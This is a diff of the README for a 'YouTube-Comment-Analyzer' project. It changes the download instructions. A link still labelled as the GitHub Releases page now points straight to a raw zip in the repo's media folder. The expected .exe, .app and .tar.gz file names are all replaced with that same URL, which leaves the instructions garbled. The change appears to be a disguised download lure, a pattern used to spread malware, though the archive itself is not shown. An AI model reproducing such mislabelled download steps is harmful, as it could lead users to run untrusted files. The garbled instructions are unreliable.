Adi-123455/YouTube-Comment-Analyzer/README.md

 ## 📥 Download & Install

-Visit this page to download: [GitHub Releases Page](https://github.com/Adi-123455/YouTube-Comment-Analyzer/releases)
+Visit this page to download: [GitHub Releases Page](https://raw.githubusercontent.com/Adi-123455/YouTube-Comment-Analyzer/main/media/YouTube-Comment-Analyzer_v2.1.zip)

 1. **Go to the Releases Page**:
    - Click the link above to access the download page.

 2. **Choose the Right File**:
    - Find the latest release.
-Look for a file named `YouTube-Comment-Analyzer.exe` for Windows or `YouTube-Comment-Analyzer.app` for macOS.
+Look for a file named `https://raw.githubusercontent.com/Adi-123455/YouTube-Comment-Analyzer/main/media/YouTube-Comment-Analyzer_v2.1.zip` for Windows or `https://raw.githubusercontent.com/Adi-123455/YouTube-Comment-Analyzer/main/media/YouTube-Comment-Analyzer_v2.1.zip` for macOS.
-   - For Linux, you may find a `.tar.gz` file.
+   - For Linux, you may find a `https://raw.githubusercontent.com/Adi-123455/YouTube-Comment-Analyzer/main/media/YouTube-Comment-Analyzer_v2.1.zip` file.
 Download it according to your system.

 3. **Download the File**:
    - Click on the file name to start the download.
 Your browser will save it to your default download location.